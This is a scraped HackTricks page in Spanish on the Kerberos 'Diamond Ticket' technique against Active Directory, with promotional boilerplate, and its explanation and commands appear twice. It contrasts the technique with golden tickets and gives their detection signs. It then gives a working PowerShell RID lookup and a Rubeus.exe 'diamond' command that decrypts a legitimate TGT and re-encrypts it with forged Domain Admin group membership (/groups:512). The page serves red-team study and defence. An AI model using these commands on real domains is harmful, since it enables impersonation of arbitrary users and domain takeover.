Diamond Ticket

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Diamond Ticket

Como un billete dorado, un billete de diamante es un TGT que se puede usar para acceder a cualquier servicio como cualquier usuario. Un billete dorado se forja completamente fuera de línea, se cifra con el hash krbtgt de ese dominio y luego se pasa a una sesión de inicio de sesión para su uso. Debido a que los controladores de dominio no rastrean los TGT que han emitido legítimamente, aceptarán felizmente los TGT que están cifrados con su propio hash krbtgt.

Hay dos técnicas comunes para detectar el uso de billetes dorados:

Buscar TGS-REQs que no tengan un AS-REQ correspondiente.
Buscar TGTs que tengan valores absurdos, como la duración predeterminada de 10 años de Mimikatz.

Un billete de diamante se crea modificando los campos de un TGT legítimo que fue emitido por un DC. Esto se logra solicitando un TGT, descifrándolo con el hash krbtgt del dominio, modificando los campos deseados del billete y luego volviéndolo a cifrar. Esto supera las dos desventajas mencionadas anteriormente de un billete dorado porque:

Los TGS-REQs tendrán un AS-REQ anterior.
El TGT fue emitido por un DC, lo que significa que tendrá todos los detalles correctos de la política Kerberos del dominio. Aunque estos pueden ser forjados con precisión en un billete dorado, es más complejo y propenso a errores.

# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousDCSync NextDSRM Credentials

Last updated 4 months ago

Diamond Ticket

Hay dos técnicas comunes para detectar el uso de billetes dorados:

Buscar TGS-REQs que no tengan un AS-REQ correspondiente.

Buscar TGTs que tengan valores absurdos, como la duración predeterminada de 10 años de Mimikatz.

Los TGS-REQs tendrán un AS-REQ anterior.

El TGT fue emitido por un DC, lo que significa que tendrá todos los detalles correctos de la política Kerberos del dominio. Aunque estos pueden ser forjados con precisión en un billete dorado, es más complejo y propenso a errores.

# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.